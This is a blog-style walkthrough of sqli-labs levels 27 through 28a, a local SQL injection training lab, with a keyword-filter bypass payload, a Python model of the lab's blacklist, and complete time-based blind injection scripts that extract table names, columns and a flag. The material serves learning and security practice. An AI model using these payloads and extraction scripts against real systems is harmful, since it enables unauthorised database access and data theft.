
sqli-labs Less-27 / Less-27a / Less-28 / Less-28a | SQL injection

TenG
Published 2020-10-28 17:44:03

Preface:

This post covers Less-27, Less-27a, Less-28 and Less-28a of the sqli-labs series. The series is being updated continuously; the earlier levels are in my previous posts. If anything here is wrong, corrections are welcome.

Body:

less27:

This level filters `union` and `select`. The fix is the same one used earlier when `or` was filtered: double-write the keyword. The difference is that here `select` has to be nested three deep (the plain double-written form is still stripped completely; I haven't read the source, so I'm not sure exactly why). I use error-based injection here, and since the database name can be read without `select`, I'll go straight to the table-dumping step, see the screenshot:

The table names are dumped successfully; here is the payload:

http://localhost/sqli-labs-master/Less-27/?id=1'||extractvalue(1,concat('~',(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))))||1='1

The point being tested is the `select` filter. Worth noting: `or` is not filtered at this level. The remaining steps are the same as in the earlier levels, so I won't repeat them.
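Why the triple-nested form survives while the plain double-written one does not, as an added example (my code, not from the post): in the sqli-labs Less-27 source, `blacklist()` runs a fixed sequence of `preg_replace` calls, and the lowercase `select` strip appears twice in that sequence (once with `/m`, once with `/s`); each call removes every non-overlapping match it finds, so `seselectlect` becomes `select` after the first strip and is gone after the second, while the triple-nested form loses one layer per strip and arrives at the database as a single `select`. The model below reproduces that pass order in Python; treat the exact order as an assumption if your copy of the lab differs. `nest()` builds a form that survives any number of strip passes, and the extractvalue payload above is checked to come out of the filter intact.

```python
import re

# Pass order of the Less-27 blacklist() as found in the sqli-labs source
# (reconstructed for this example; verify against your copy of the lab).
# PHP's "[--]" character class is just the single character '-'.
LESS27_PASSES = [
    r"[/*]",      # strip / and *
    r"-",         # strip -
    r"#",         # strip #
    r"[ +]",      # strip spaces and +
    r"select",    # lowercase select, first pass (/m)
    r"[ +]",
    r"union",
    r"select",    # lowercase select, second pass (/s)
    r"UNION",
    r"SELECT",
    r"Union",
    r"Select",
]


def less27_blacklist(s: str) -> str:
    """Apply each preg_replace pass once, in order; every pass removes all
    non-overlapping matches it finds, exactly like preg_replace()."""
    for pattern in LESS27_PASSES:
        s = re.sub(pattern, "", s)
    return s


def nest(keyword: str, depth: int, split: int = 2) -> str:
    """Build a keyword that survives depth-1 strip passes: each level splits the
    keyword and puts the previous level inside it, so every pass peels off exactly
    one inner copy.  nest('select', 2) == 'seselectlect' (the usual double-write);
    nest('select', 3) survives two passes.  Inserting the keyword at a boundary
    instead of inside a copy would leave two adjacent matches for one pass to eat."""
    s = keyword
    for _ in range(depth - 1):
        s = keyword[:split] + s + keyword[split:]
    return s


def survives(keyword_form: str, keyword: str = "select") -> bool:
    """True if what reaches MySQL is the keyword (MySQL keywords are case-insensitive,
    so a mixed-case form that the filter never touches also counts)."""
    return less27_blacklist(keyword_form).lower() == keyword.lower()


# The post's Less-27 error-based payload (query-string value, before URL encoding).
PAYLOAD = ("1'||extractvalue(1,concat('~',(seselselectectlect(group_concat(table_name))"
           "from(information_schema.tables)where(table_schema='security'))))||1='1")


if __name__ == "__main__":
    for form in ["select", "seselectlect", "seselselectectlect", "SeLeCt", nest("select", 3)]:
        print(f"{form:22} -> {less27_blacklist(form)!r}")
    print(less27_blacklist(PAYLOAD))
```

The `union` pass also explains why `union select` with a space is hopeless here: the space is stripped first, then both keywords, leaving nothing; that is why the post switches to `extractvalue()` error-based injection, which needs no `union`.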

less27a:

This level differs little from Less-26a: again there is no error output, and it filters `select` on top of what 26a filtered. Straight to the script:

Script (Python):

import requests
import datetime

# Less-27a closes the id with a double quote; '&&' is sent URL-encoded as %26%26
url = 'http://localhost/sqli-labs-master/Less-27a/?id=1"'

def delayed(payload):
    # True when the server took the sleep(2) branch, i.e. the injected comparison held
    time1 = datetime.datetime.now()
    requests.get(url+payload)
    time2 = datetime.datetime.now()
    return (time2-time1).total_seconds() > 1

def get_dbname():
    db_name = ''
    for i in range(1,11):                 # substr() positions start at 1, not 0
        for k in range(32,127):           # printable ASCII
            payload = '%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            if delayed(payload):
                db_name += chr(k)
                print("Database name ->"+db_name)
                break                     # character found, move to the next position
get_dbname()

def get_table():
    tables_name = ''
    for i in range(1,41):
        for k in range(32,127):
            # the plain double-written select is stripped completely, so it is nested three deep
            payload = '%%26%%26if(ascii(substr((seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            if delayed(payload):
                tables_name += chr(k)
                print("All table names ->"+tables_name)
                break
get_table()

def get_columns():
    columns_name = ''
    for i in range(1,11):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(group_concat(column_name))from(information_schema.columns)where(table_name="flag")),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            if delayed(payload):
                columns_name += chr(k)
                print("All column names ->"+columns_name)
                break
get_columns()

def get_flag():
    flag = ''
    for i in range(1,41):
        for k in range(32,127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261="1'%(i,k)
            if delayed(payload):
                flag += chr(k)
                print("flag ->"+flag)
                break
get_flag()

[Screenshot: the script's output]

The differences are small, so no detailed walkthrough.

less28:

Here is Less-28 directly. I didn't read anyone else's write-up and just did it myself. I'm not sure why Less-28 is easier than Less-27a: 27a uses a double quote while 28 uses a single quote, and `select` is not filtered at all (in the blogs I looked at, other people say the back end only filters `union select` when the two are used together), so the same script as before works:

Script (Python):

import requests
import datetime

# Less-28 closes the id with a single quote; '&&' is sent URL-encoded as %26%26
url = "http://localhost/sqli-labs-master/Less-28/?id=1'"

def delayed(payload):
    # True when the server took the sleep(2) branch, i.e. the injected comparison held
    time1 = datetime.datetime.now()
    requests.get(url+payload)
    time2 = datetime.datetime.now()
    return (time2-time1).total_seconds() > 1

def get_dbname():
    db_name = ''
    for i in range(1,11):                 # substr() positions start at 1, not 0
        for k in range(32,127):           # printable ASCII
            payload = "%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            if delayed(payload):
                db_name += chr(k)
                print("Database name ->"+db_name)
                break                     # character found, move to the next position
get_dbname()

def get_tables():
    tables_name = ''
    for i in range(1,41):
        for k in range(32,127):
            # a bare select is not filtered here, only 'union select' together
            payload = "%%26%%26if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            if delayed(payload):
                tables_name += chr(k)
                print("All table names ->"+tables_name)
                break
get_tables()

def get_columns():
    columns_name = ''
    for i in range(1,11):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            if delayed(payload):
                columns_name += chr(k)
                print("All column names ->"+columns_name)
                break
get_columns()

def get_flag():
    flag = ''
    for i in range(1,41):
        for k in range(32,127):
            payload = "%%26%%26if(ascii(substr((select(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261='1"%(i,k)
            if delayed(payload):
                flag += chr(k)
                print("flag ->"+flag)
                break
get_flag()

less28a:

This level again uses time-based (boolean) blind injection; in testing, the script turned out to be exactly the same as for Less-26a, so see the Less-26a post for details.

Done, thanks for reading!

This article is part of the Tencent Cloud self-media syndication programme and was shared from the author's personal site/blog.
Originally published 2020/10/19.